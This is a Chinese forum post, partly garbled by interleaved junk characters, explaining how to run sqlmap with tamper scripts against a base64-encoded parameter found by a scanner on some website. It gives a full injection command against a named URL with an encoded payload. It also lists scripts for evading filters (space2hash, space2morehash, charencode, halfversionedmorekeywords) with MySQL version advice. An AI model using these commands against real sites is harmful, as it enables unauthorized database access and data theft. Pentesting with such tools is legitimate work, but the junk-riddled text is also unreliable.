WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?( j4 J6 [1 a8 l$ B% R Y; D
; r$ M, {) M ^% ]sqlmap的tamper里有个base64encode.py" R j$ r# ^2 A3 M/ D: [+ f
5 v. y& j' z! i3 B0 l使用如下0 C+ s1 i3 g$ B E* @
# v$ s; P" C* }' h- K) asqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
% V1 _3 u4 s1 O2 O3 {0 a; V/ q( O
/ Y! G. o5 t" k ]: v" d5 e
8 E' V9 g" G1 p7 ]( ^sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
, ^' {, j+ i& n$ f3 }* @( S2 d( N- j! D- h
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:' ]& V3 ? m. Y; n
, l" d- z% d9 I0 X' A
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
" x9 R# G7 }' p$ gspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
# P9 j" k# N1 Q4 c3 O5 r首先确定目标数据库版本,然后选择相应的脚本。# [7 k# }! E6 R1 E# L9 @
-v 3 --batch --tamper "space2hash.py"
- ^; x# }2 U9 _5 O
$ f1 p0 g7 }' V/ V+ w4 ?. E5 U1 ], ?# ?还有其他一些插件:
% ^/ C2 n) [ A1 g9 T' ], O% m' s& bencodes编码 ——charencode.py
% ?% ~; m* W# A6 H/ h, dbase64编码 —— base64encode.py8 } ?) T6 a! [
替换空格和关键字 —— halfversionedmorekeywords.py
5 l& p* n4 D: C1 ~- {, z" K: X" o |
i$ ]6 f9 m- L- K4 a8 b
1 u7 v+ x( K. p0 X& F
+ {: ~5 P, g" u( C5 W) d: y# x G2 X1 m; O
|
发表于 2013-11-23 15:50:45
收藏
支持
反对